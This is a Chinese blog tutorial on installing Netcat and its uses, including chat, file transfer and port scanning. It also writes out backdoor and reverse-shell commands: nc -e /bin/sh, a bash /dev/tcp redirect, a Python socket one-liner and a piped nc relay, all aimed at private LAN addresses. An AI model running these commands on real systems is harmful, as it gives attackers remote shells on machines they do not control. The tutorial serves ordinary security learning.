瑞士军刀——Netcat的安装与详细使用

最新推荐文章于 2024-05-23 19:22:17 发布
最新推荐文章于 2024-05-23 19:22:17 发布
阅读量4.2k 收藏 28
点赞数 3
分类专栏: 神器使用篇 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73185293/article/details/132050558
版权

作者永不落的梦想

作者主页传送

座右铭过去属于死神,未来属于自己

本文专栏神器使用篇

今日鸡汤当你在夜晚孤军奋战时,漫天星光为你而闪烁

目录

一、介绍

二、安装

1.在Windows下安装

2.在kali下安装

三、基本使用

1.命令参数

2.会话连接

3.shell连接

​编辑

4.文件传输

5.信息探测

6.建立后门

7.连接转发

8.反弹shell

一、介绍

        Netcat简称nc,被誉为网安的“瑞士军刀”,是一款强大的网络命令行工具,其体积小巧、功能强大,用于建立主机间的TCP/UDP连接,并通过标准输入输出进行数据的读写,可实现端口监听、文件传输、建立后门、端口转发、shell反弹等功能;

二、安装

1.在Windows下安装

下载地址:https://eternallybored.org/misc/netcat/

 有两个版本可选择一个点击安装;

安装后解压即可使用,在nc.exe程序的目录打开cmd:nc.exe -l -p 9999,也可以将nc.exe所在目录添加到环境变量中再使用cmd:nc -l -p 9999,nc具体使用可用nc.exe -h查看使用说明;

2.在kali下安装

在Linux中安装,kali一般自带nc,若无可使用安装命令安装:

安装命令:yum install nc

查看nc使用说明:nc -h

三、基本使用

1.命令参数

可执行nc -h命令查看netcat的命令参数

-d        脱离命令行,当命令行关闭后不会关闭nc,而在后台运行,常用于后面建立,如nc -l           -p 9999 -d

-e        命令执行,常用于后面建立,如nc -l -p 9999 -e /bin/sh

-l         设置netcat处于监听状态等待连接,如nc -l -p 9999

-L        设置netcat处于监听状态等待连接,且当客户端断开后回到监听状态等待连接,如nc            -L -p 9999

-n       只识别IP地址而不做DNS解析,如nc -l -p 9999 -n

-p       设置监听的端口号,如nc -l -p 9999

-r        设置随机监听端口号,如nc -l -r

-s       设置netcat源IP地址,用于隐藏服务端;

-u       设置netcat使用UDP模式,不指定u参数默认使用TCP;

-v       显示错误提示信息;

-w secs        设置连接超时秒数secs;

-z       设置netcat扫描模式,发送的数据包不含payload可加快速度缩短时间;

2.会话连接

        服务端为开启nc监听等待连接的一方,客户端为连接nc服务端的一方;

        会话连接可使nc连接的双方进行交互,连接后输入内容回车即可发送消息;

服务端:nc -l -p 9999

客户端:nc 192.168.83.102 9999

192.168.83.102为服务端IP,9999为服务端开放的nc监听端口等待连接,客户端连接后,服务端和客户端可进行会话交互;

3.shell连接

        服务端的nc监听使用参数e指定shell,客户端连接后可获得服务端的shell执行命令;

服务端:nc -l -p 9999 -e /bin/sh

客户端:nc 192.168.83.102 9999

4.文件传输

        使用输出重定向>可实现nc传输文件;

客户端传输文件给服务端,将1.txt文件内容传输给服务端保存为flag.txt文件:

服务端:nc -l -p 9999 > flag.txt

客户端:nc 192.168.83.102 < 1.txt

也可以服务端向客户端传输文件,只需改变输出重定向>的方向即可:

服务端:nc -l -p 9999 < flag.txt

客户端:nc 192.168.83.102 > 1.txt

5.信息探测

探测目标主机192.168.83.10的端口信息:

nc -n -v -w1 -z 192.168.83.10 1-1023

6.建立后门

①监听型,客户端获取服务端的shell,与shell连接类似:

服务端:nc -l -p 9999 -e /bin/sh

客户端:nc 192.168.83.102 9999

②连接型,服务端获取客户端的shell,与shell连接类似:

服务端:nc -l -p 9999

客户端:nc 192.168.83.102 9999 -e /bin/sh

7.连接转发

主机1与主机2处于同一网段,主机3为主机1的内网,主机2不能直接访问主机3但可以通过主机1间接访问主机3;

主机3:nc -l -p 9999

主机1:nc -l -p 7777 -e delay.bat,delay.bat内容:nc 主机3IP 9999

主机2:nc 主机1IP 7777

这样即可建立主机2与主机3的nc连接;

8.反弹shell

反弹shell,即客户端开启端口监听等待服务端连接,服务端连接后,客户端可获得服务端的shell;

①服务端安装了netcat时:

服务端:nc 192.168.83.102 9999 -e /bin/sh

客户端:nc -l -p 9999

②服务端没有安装netcat时:

服务端:bash -i >& /dev/tcp/192.168.83.102/9999 0>&1

 客户端:nc -l -p 9999

③服务端无netcat,但有python时,

服务端:

# 需改为客户端的IP和端口
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.83.102",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

客户端:nc -l -p 9999

④服务端不支持-e参数时,

服务端:nc 192.168.83.102 9999 | /bin/sh | nc 192.168.83.102 7777

客户端:nc -lvp 9999,nc -lvp 7777

 客户端开启两个监听端口,反弹shell后可实现:在9999端口的nc中输入命令,执行结果返回在7777端口的nc中;

永不落的梦想
关注
  • 3
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
windows下的netcat
11-24
windows下的netcat
netcat 瑞士军刀 linux windows netcat 瑞士军刀 linux windows
04-15
本软件包含windows和linux两种版本 1、 了解NC的用法 命令:   nc –h 技巧:   win98用户可以在autoexec.bat加入path=nc的路径,win2000用户在环境变量中加入path中,linux含有这个命令(redhat) 1、基本使用   想要连接到某处: nc [-options] hostname port[s] [ports] ...   绑定端口等待连接: nc -l -p port [-options] [hostname] [port]   参数:   -e prog 程序重定向,一旦连接,就执行 [危险!!]   -g gateway source-routing hop point[s], up to 8   -G num source-routing pointer: 4, 8, 12, ...   -h 帮助信息   -i secs 延时的间隔   -l 监听模式,用于入站连接   -n 指定数字的IP地址,不能用hostname   -o file 记录16进制的传输   -p port 本地端口号   -r 任意指定本地及远程端口   -s addr 本地源地址   -u UDP模式   -v 详细输出——用两个-v可得到更详细的内容   -w secs timeout的时间   -z 将输入输出关掉——用于扫描时   其中端口号可以指定一个或者用lo-hi式的指定范围。   例如:扫描端口   tcp扫描   C:\nc>nc -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?)   net [192.168.0.80] 139 (netbios-ssn) open   net [192.168.0.80] 138 (?)   net [192.168.0.80] 137 (netbios-ns)   net [192.168.0.80] 136 (?)   net [192.168.0.80] 135 (epmap) open   net [192.168.0.80] 81 (?) open   net [192.168.0.80] 80 (http) open   net [192.168.0.80] 79 (finger)   net [192.168.0.80] 25 (smtp) open   net [192.168.0.80] 24 (?)   net [192.168.0.80] 23 (telnet)   net [192.168.0.80] 21 (ftp)   udp扫描   C:\nc>nc -u -v -z -w2 192.168.0.80 1-140   net [192.168.0.80] 140 (?) open   net [192.168.0.80] 139 (?) open   net [192.168.0.80] 138 (netbios-dgm) open   net [192.168.0.80] 137 (netbios-ns) open   net [192.168.0.80] 54 (?) open   net [192.168.0.80] 53 (domain) open   net [192.168.0.80] 38 (?) open   net [192.168.0.80] 37 (time) open   net [192.168.0.80] 7 (echo) open 2、高级应用   1.Window用法:   (1)IE的MIME欺骗   www.try2hack..nl(是一个让初学黑客技术的人去做实验的站点)   打开这个页面,有http://www.try2hack/cgi-bin/level7页面(这个网站提供了黑客的8关,过了这8关证明你开始入门了),这个页面告诉我们的浏览器不是 IE6.72,我们的操作系统不是LIUNX,我们不是从www.microsoft/ms重定向链接过去的,有病阿(这是一个题目呀,要慢慢研究),linux有IE6.72? 微软会在它的页面上放的链接?看看页面的源代码,是在服务器端 执行的perl脚本,根本无法看到,还是研究一下IE5和它通信时都告诉了它什么,抓包,我们会发现,我们的IE5告诉对方: 我是MSIE 5.0; Windows NT 5.0; .NET CLR 1.0.3705。。。。哈哈,这个cgi应该是根据这些信息知道我们不是它要求的 客户,嘿嘿,需要欺骗对方才行,用军刀来可以实现,如下做就可
netcat一键开始瑞士军刀模式(KALI工具系列六)
最新发布
LNN0212的博客
05-23 1067
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux发行版,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。Netcat(或nc)是一个命令行实用程序,它使用TCP或UDP协议跨网络连接读取和写入数据。它是网络和系统管理员工具库中最强大的工具之一,它被认为是瑞士军刀网络工具。
NetCat(NC)详细教程
qq_41245301的博客
11-29 500
1995年第一个版本公布,NetCat是一个非常简单的Unix工具,可以读、写TCP或UDP网络连接(network connection)。它被设计成一个可靠的后端(back-end)工具,能被其它的程序程序或脚本直接地或容易地驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能。NetCat,它的实际可运行的名字叫nc,应该早很就被提供,就象另一个没有公开但是标准的Unix工具。
Linux(kali)中nc/ncat实操
Selma003的博客
04-12 7837
ncat和nc命令的一些实战:文本传输、文件传输、远程控制。
【Linux】离线和在线环境下安装netcat
weixin_44462773的博客
04-10 2379
详细介绍了在离线和在线环境下netcat(nc)的下载及安装
netcat使用
weixin_30784141的博客
04-17 627
前言 最近在做渗透测试的时候遇到了端口监听和shell的反弹问题,在这个过程中自己对Netcat这一款神器有了新的认识,现将一些Netcat的用法做一个小总结,希望对各位有帮助! Netcat简介 Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话...
Netcat 介绍及使用
黄晓宇的博客
02-21 2万+
Netcat 介绍 Netcat(简称nc)是一款强大的命令行网络工具,用来在两台机器之间建立TCP/UDP连接,并通过标准的输入输出进行数据的读写 Netcat 安装 大部分的Linux发行版会都会自带Netcat,可以使用nc命令查看系统中是否有安装Netcat $ nc usage: nc [-46AacCDdEFhklMnOortUuvz] [-K tc] [-b boundif] [-i interval] [-p source_port] [--apple-recv-anyif] [--.
Windows 下载安装 netcat(nc)命令
mry6的博客
07-04 4万+
@[TOC](Windows 下载安装 netcat(nc)命令) netcat(nc)下载 netcat(nc)下载地址:https://eternallybored.org/misc/netcat/ 请求 netcat(nc)下载地址 点击 netcat 1.12 链接进行下载 netcat(nc)安装 解压netcat-win32-1.12文件夹 配置环境变量 在Path里添加netcat路径: 测试 打开两个cmd窗口 第一个执行: 第二个执行: ...
Netcat安装使用(nc)
剁椒鱼头没剁椒的博客
02-23 7857
Netcat 是一款简单的Unix工具,使用UDP和TCP协议,被称为网络工具中的"瑞士军*刀"。它是一个可靠的容易被其他程序所启用的后台操作工具,同时它也被用作网络的测试工具或黑客工具。使用它你可以轻易的建立任何连接。
【Windows】安装 netcat(nc)
微信公众号: 后端码匠
01-05 870
解压netcat-win32-1.12文件夹。第一个窗口输入 第二个窗口就会接收。
瑞士军刀 NC Netcat
09-28
Netcat for NT is the tcp/ip "Swiss Army knife" that never made it into any of the resource kits. It has proved to be an extremely versatile tool on the unix platform. So why should NT always be unix...
使用netcat(瑞士军刀)进行文件传输
09-15
netcat是开源世界的经典应用之一,被称为网络瑞士军刀。几乎所有的发行版都会带这个小程序,用它可以在任意两台有网络链接的机器上传输文件, 下面我们就来简单看下他的使用方法吧。
netcat瑞士军刀for windows
12-02
netcat瑞士军刀for windows,此工具功能那是相当的强大. netcat for windows. 此包中包含两个版本, 一个版本不带-e参数, 另一个参数比较全.
瑞士军刀 netcat 源码
11-27
netcat源码 vc6++编译通过。。 [v1.11 NT www.vulnwatch.org/netcat/] connect to somewhere: nc [-options] hostname port[s] [ports] ... listen for inbound: nc -l -p port [options] [hostname] [port] ...
yum安装netcat
HouYing
04-04 5111
yum install -y nc 启动 nc -l port
windows环境下netcat安装使用
热门推荐
qq_37585545的博客
08-31 7万+
1.下载netcat。下载地址:https://eternallybored.org/misc/netcat/ 2.解压文件夹‘ 3.将文件夹中的所有内容复制到C:\Windows\System32的文件夹下 4.打开命令界面:Windows+R  cmd。输入nc 命令即可....
centOS7 netcat下载安装教程
11-15
以下是CentOS7上Netcat的下载和安装教程: 1.使用wget命令下载Netcat安装包: ```shell wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz ``` 2.解压安装包: ```shell tar -zxvf netcat-0.7.1.tar.gz ``` 3.进入解压后的目录: ```shell cd netcat-0.7.1 ``` 4.编译和安装Netcat: ```shell ./configure make make install ``` 5.配置环境变量: ```shell export NETCAT_HOME=/home/netcat-0.7.1 export PATH=$PATH:$NETCAT_HOME/bin ``` 6.检查Netcat是否安装成功: ```shell nc -h ``` 如果成功安装,将会输出Netcat的帮助信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值